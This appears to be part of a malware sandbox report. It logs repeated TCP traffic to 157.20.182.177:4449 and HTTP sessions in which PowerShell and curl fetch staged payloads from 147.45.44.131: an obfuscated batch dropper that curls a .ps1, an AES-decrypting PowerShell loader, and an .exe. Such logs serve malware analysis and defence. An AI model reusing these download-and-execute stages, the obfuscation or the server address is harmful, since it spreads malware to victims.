                                                                    Jan 1, 2025 08:49:25.810749054 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:25.815577984 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:25.815673113 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:25.820583105 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:35.994009018 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:35.998848915 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:35.998903036 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:36.003686905 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:36.292639971 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:36.424500942 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:36.424604893 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:36.426654100 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:36.432099104 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:36.432152033 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:36.436933994 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:40.619350910 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:40.624180079 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:40.628731012 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:40.633570910 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:40.911397934 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:40.977945089 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:41.041384935 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:41.043714046 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:41.048492908 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:41.048559904 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:41.053325891 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:44.119276047 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:44.124129057 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:44.124172926 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:44.129003048 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:44.412174940 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:44.478362083 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:44.544652939 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:44.550349951 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:44.555133104 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:44.562352896 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:44.567150116 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:52.275369883 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:52.281229973 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:52.281303883 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:52.287194967 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:52.569848061 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:52.620413065 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:52.700664043 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:52.702379942 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:52.707225084 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:52.708451986 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:52.713217020 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:59.915831089 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:59.920777082 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:49:59.920835018 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:49:59.925559998 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:00.208043098 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:00.259239912 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:00.341310978 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:00.343379974 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:00.348187923 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:00.348231077 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:00.353060007 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:03.181463003 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:03.186398029 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:03.186532974 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:03.191358089 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:03.477837086 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:03.524873972 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:03.608885050 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:03.610826015 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:03.615638971 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:03.615679979 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:03.620496035 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:16.400615931 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:16.405504942 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:16.405550003 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:16.410384893 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:16.693322897 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:16.759377003 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:16.826417923 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:16.830418110 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:16.835189104 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:16.835283041 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:16.840034962 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:28.056565046 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:28.061417103 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:28.061470985 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:28.066245079 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:28.348933935 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:28.399952888 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:28.481173992 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:28.482995033 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:28.487850904 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:28.487898111 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:28.492666006 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:30.134701014 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:30.139621973 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:30.139678001 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:30.144469976 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:30.427213907 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:30.478068113 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:30.560560942 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:30.565834045 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:30.570595026 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:30.572905064 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:30.577714920 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:37.994110107 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:37.999036074 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:37.999108076 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:38.003860950 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:38.287194967 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:38.421832085 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:38.421892881 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:38.423099995 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:38.427869081 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:38.428031921 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:38.432885885 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:51.213219881 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:51.218148947 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:51.218308926 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:51.223133087 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:51.506084919 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:51.558495998 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:51.636735916 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:51.638638973 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:51.652245045 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:50:51.652287960 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:50:51.658935070 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:04.431708097 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:04.436568022 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:04.436623096 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:04.441426039 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:04.739694118 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:04.794533968 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:04.872581005 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:04.873722076 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:04.878539085 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:04.882628918 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:04.887458086 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:17.650702000 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:17.655662060 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:17.655730009 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:17.660496950 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:17.943806887 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:17.993813038 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:18.076699018 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:18.078727007 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:18.083540916 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:18.083590031 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:18.088355064 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:29.760024071 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:29.764949083 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:29.764998913 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:29.769772053 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:30.067852020 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:30.118854046 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:30.196625948 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:30.198343039 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:30.203182936 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:30.203246117 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:30.208065033 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:39.541939974 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:39.546804905 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:39.546892881 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:39.551706076 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:39.840487003 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:39.884520054 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:39.972587109 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:39.973978043 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:39.978781939 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:39.978835106 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:39.983666897 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:48.009924889 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:48.014758110 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:48.014801979 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:48.019598007 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:48.301750898 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:48.353277922 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:48.432656050 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:48.434263945 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:48.439574003 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:51:48.439621925 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:51:48.444884062 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:52:01.181761980 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:52:01.186609983 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:52:01.186794043 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:52:01.191611052 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:52:01.474544048 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:52:01.528871059 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:52:01.604583025 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:52:01.640943050 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:52:01.645658970 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:52:01.645726919 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:52:01.650446892 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:52:07.525566101 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:52:07.530342102 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:52:07.530404091 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:52:07.535218954 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:52:07.817693949 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:52:07.868983984 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:52:07.941344023 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:52:07.941957951 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:52:07.946738005 CET444949733157.20.182.177192.168.2.4
                                                                    Jan 1, 2025 08:52:07.946800947 CET497334449192.168.2.4157.20.182.177
                                                                    Jan 1, 2025 08:52:07.951575041 CET444949733157.20.182.177192.168.2.4
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 1, 2025 08:48:42.140911102 CET5356807162.159.36.2192.168.2.4
                                                                    Jan 1, 2025 08:48:43.185142994 CET53595741.1.1.1192.168.2.4
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Jan 1, 2025 08:48:10.794502974 CET1.1.1.1192.168.2.40x6960No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                    Jan 1, 2025 08:48:10.794502974 CET1.1.1.1192.168.2.40x6960No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                    • 147.45.44.131
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.449730147.45.44.131807528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 1, 2025 08:48:00.452387094 CET275OUTGET /infopage/gqub.bat HTTP/1.1
                                                                    X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                    Host: 147.45.44.131
                                                                    Connection: Keep-Alive
                                                                    Jan 1, 2025 08:48:01.077001095 CET1236INHTTP/1.1 200 OK
                                                                    Date: Wed, 01 Jan 2025 07:48:00 GMT
                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                    Last-Modified: Sat, 28 Dec 2024 19:56:28 GMT
                                                                    ETag: "da7-62a59f994e800"
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 3495
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-msdos-program
                                                                    Data Raw: 40 25 d5 8b e1 83 9a e8 83 bd 25 65 25 d5 8b e1 83 9a e8 83 bd 25 63 25 d5 8b e1 83 9a e8 83 bd 25 68 25 d5 8b e1 83 9a e8 83 bd 25 6f 25 d5 8b e1 83 9a e8 83 bd 25 20 25 d5 8b e1 83 9a e8 83 bd 25 6f 25 d5 8b e1 83 9a e8 83 bd 25 66 25 d5 8b e1 83 9a e8 83 bd 25 66 25 d5 8b e1 83 9a e8 83 bd 25 0d 0a 73 25 d5 8b e1 83 9a e8 83 bd 25 65 25 d5 8b e1 83 9a e8 83 bd 25 74 25 d5 8b e1 83 9a e8 83 bd 25 6c 25 d5 8b e1 83 9a e8 83 bd 25 6f 25 d5 8b e1 83 9a e8 83 bd 25 63 25 d5 8b e1 83 9a e8 83 bd 25 61 25 d5 8b e1 83 9a e8 83 bd 25 6c 25 d5 8b e1 83 9a e8 83 bd 25 0d 0a 0d 0a 73 25 d5 8b e1 83 9a e8 83 bd 25 65 25 d5 8b e1 83 9a e8 83 bd 25 74 25 d5 8b e1 83 9a e8 83 bd 25 20 25 d5 8b e1 83 9a e8 83 bd 25 22 25 d5 8b e1 83 9a e8 83 bd 25 75 25 d5 8b e1 83 9a e8 83 bd 25 72 25 d5 8b e1 83 9a e8 83 bd 25 6c 25 d5 8b e1 83 9a e8 83 bd 25 3d 25 d5 8b e1 83 9a e8 83 bd 25 68 25 d5 8b e1 83 9a e8 83 bd 25 74 25 d5 8b e1 83 9a e8 83 bd 25 74 25 d5 8b e1 83 9a e8 83 bd 25 70 25 d5 8b e1 83 9a e8 83 bd 25 3a 25 [TRUNCATED]
                                                                    Data Ascii: @%%e%%c%%h%%o%% %%o%%f%%f%%s%%e%%t%%l%%o%%c%%a%%l%%s%%e%%t%% %%"%%u%%r%%l%%=%%h%%t%%t%%p%%:%%/%%/%%1%%4%%7%%.%%4%%5%%.%%4%%4%%.%%1%%3%%1%%/%%i%%n%%f%%o%%p%%a%%g%%e%%/%%v%%f%%r%%c%%x%%q%%.%%p%%s%%1%%"%%s%%e%%t%% %%"%%h%%e%%a%%d%%e%%r%%N%%a%%m%%e%%=%%X%%
                                                                    Jan 1, 2025 08:48:01.077017069 CET1236INData Raw: 2d 25 d5 8b e1 83 9a e8 83 bd 25 53 25 d5 8b e1 83 9a e8 83 bd 25 70 25 d5 8b e1 83 9a e8 83 bd 25 65 25 d5 8b e1 83 9a e8 83 bd 25 63 25 d5 8b e1 83 9a e8 83 bd 25 69 25 d5 8b e1 83 9a e8 83 bd 25 61 25 d5 8b e1 83 9a e8 83 bd 25 6c 25 d5 8b e1
                                                                    Data Ascii: -%%S%%p%%e%%c%%i%%a%%l%%-%%H%%e%%a%%d%%e%%r%%"%%s%%e%%t%% %%"%%h%
                                                                    Jan 1, 2025 08:48:01.077047110 CET1236INData Raw: d5 8b e1 83 9a e8 83 bd 25 22 25 d5 8b e1 83 9a e8 83 bd 25 0d 0a 0d 0a 63 25 d5 8b e1 83 9a e8 83 bd 25 6d 25 d5 8b e1 83 9a e8 83 bd 25 64 25 d5 8b e1 83 9a e8 83 bd 25 2e 25 d5 8b e1 83 9a e8 83 bd 25 65 25 d5 8b e1 83 9a e8 83 bd 25 78 25 d5
                                                                    Data Ascii: %"%%c%%m%%d%%.%%e%%x%%e%% %%/%%c%% %%c%%u%%r%%l%% %%-%%s%% %%-%
                                                                    Jan 1, 2025 08:48:01.077058077 CET91INData Raw: 25 d5 8b e1 83 9a e8 83 bd 25 6e 25 d5 8b e1 83 9a e8 83 bd 25 64 25 d5 8b e1 83 9a e8 83 bd 25 6c 25 d5 8b e1 83 9a e8 83 bd 25 6f 25 d5 8b e1 83 9a e8 83 bd 25 63 25 d5 8b e1 83 9a e8 83 bd 25 61 25 d5 8b e1 83 9a e8 83 bd 25 6c 25 d5 8b e1 83
                                                                    Data Ascii: %%n%%d%%l%%o%%c%%a%%l%%


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.449731147.45.44.131807788C:\Windows\System32\curl.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 1, 2025 08:48:01.259046078 CET196OUTGET /infopage/vfrcxq.ps1 HTTP/1.1
                                                                    Host: 147.45.44.131
                                                                    User-Agent: curl/7.83.1
                                                                    Accept: */*
                                                                    X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                    Jan 1, 2025 08:48:01.870188951 CET1236INHTTP/1.1 200 OK
                                                                    Date: Wed, 01 Jan 2025 07:48:01 GMT
                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                    Last-Modified: Sat, 28 Dec 2024 19:53:14 GMT
                                                                    ETag: "638-62a59ee0cb610"
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 1592
                                                                    Data Raw: 0d 0a 24 48 64 59 49 20 3d 20 27 69 30 62 35 56 50 58 5a 69 74 64 37 69 36 76 55 69 38 75 2b 73 38 58 4c 6c 48 50 36 58 55 71 38 43 4a 43 65 52 78 74 76 67 30 63 3d 27 0d 0a 24 7a 56 63 54 20 3d 20 27 31 43 6f 6a 6f 74 6a 52 35 41 7a 68 32 47 71 73 61 68 74 56 36 77 3d 3d 27 0d 0a 24 69 6b 4a 4c 20 3d 20 27 6e 4c 59 53 77 4a 39 67 30 32 32 32 5a 6b 48 4c 32 4a 6b 56 52 6a 59 65 32 79 30 6d 39 43 41 63 36 6f 37 58 36 6e 45 49 2b 77 37 74 34 35 33 61 44 49 56 4c 7a 5a 42 7a 34 6e 64 74 6a 32 49 64 64 6f 77 49 30 6b 49 4d 4b 64 45 6c 76 75 35 33 4b 79 66 71 32 63 72 2f 59 6e 31 73 72 2b 6d 6f 31 63 73 6c 41 37 4b 52 65 2b 42 78 4d 52 67 55 62 71 68 30 4c 4d 31 2f 48 54 77 78 59 54 68 59 49 58 38 47 58 4d 55 4d 30 53 70 79 4a 62 79 6f 42 64 76 6d 5a 6d 74 56 58 6d 67 78 41 65 70 79 56 7a 4b 51 42 57 57 43 6f 76 47 44 74 58 4b 42 73 47 68 6e 71 4c 32 55 77 50 53 48 65 45 68 50 4a 48 68 52 58 6e 2b 54 37 64 66 48 54 4a 35 32 77 72 56 53 62 64 61 57 44 31 6b 48 78 39 6e 30 59 67 68 59 31 41 67 46 4c 4c 6a [TRUNCATED]
                                                                    Data Ascii: $HdYI = 'i0b5VPXZitd7i6vUi8u+s8XLlHP6XUq8CJCeRxtvg0c='$zVcT = '1CojotjR5Azh2GqsahtV6w=='$ikJL = 'nLYSwJ9g0222ZkHL2JkVRjYe2y0m9CAc6o7X6nEI+w7t453aDIVLzZBz4ndtj2IddowI0kIMKdElvu53Kyfq2cr/Yn1sr+mo1cslA7KRe+BxMRgUbqh0LM1/HTwxYThYIX8GXMUM0SpyJbyoBdvmZmtVXmgxAepyVzKQBWWCovGDtXKBsGhnqL2UwPSHeEhPJHhRXn+T7dfHTJ52wrVSbdaWD1kHx9n0YghY1AgFLLjPO8cqRHrXEZnSIKZBSYnCaItRBJ0Dh1Cy/IyzJ3Sg5KMlnuHxBz0BEmMxEp/eQ5wcZMZqG4neGvd9xP1tiAw1jicbjOHecXrlpgyE4a3DcILjExDWpcVSxpk2eA+C7eHdVOD+MrFb/6wVS5OCq56clP20w7QReiVf8ACfqIARHE3rEsQlx+K4caYbjh++Y008QGu8gNyxJmIy/ChPrky9yGAVP0Qo20/A0K70xGaI/0JJ99YC5W9EMcUmxk25KzX88bk5d0SEMeqfRQdd5HDYx2lxl6/6Mq3eo/gfPAAkb4B2xrBCbGbqN79D1a0Xx2LVHltBT6JPVcXodUF7rJ/e5l9cIG1F5rQkGlayrJn68iI3/goA1fsn9uB/eWlDuUue00sCO4ojoq2V13NtKzOS'function lRbI ($FMat, $HdYI, $zVcT) { $QTyI = [Convert]::FromBase64String($HdYI) $506d = [Convert]::FromBase64String($zVcT) $ivrr = [Convert]::FromBase64String($FMat) $1pwX = [System.Security.Cryptography.Aes]::Create() $1pwX.Key = $QTyI [TRUNCATED]
                                                                    Jan 1, 2025 08:48:01.870206118 CET561INData Raw: 64 0d 0a 20 20 20 20 24 31 70 77 58 2e 50 61 64 64 69 6e 67 20 3d 20 5b 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 2e 50 61 64 64 69 6e 67 4d 6f 64 65 5d 3a 3a 50 4b 43 53 37 0d 0a 20 20 20 20 24 73 71 79
                                                                    Data Ascii: d $1pwX.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $sqyY = $1pwX.CreateDecryptor($1pwX.Key, $1pwX.IV) $34Tn = New-Object System.IO.MemoryStream(, $ivrr) $QRpS = New-Object System.Security.Cryptography.Crypt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.449732147.45.44.131807772C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 1, 2025 08:48:03.469403982 CET181OUTGET /infopage/vfdjo.exe HTTP/1.1
                                                                    X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                    Host: 147.45.44.131
                                                                    Connection: Keep-Alive
                                                                    Jan 1, 2025 08:48:04.092248917 CET1236INHTTP/1.1 200 OK
                                                                    Date: Wed, 01 Jan 2025 07:48:04 GMT
                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                    Last-Modified: Sat, 28 Dec 2024 19:39:12 GMT
                                                                    ETag: "8e00-62a59bbda5efb"
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 36352
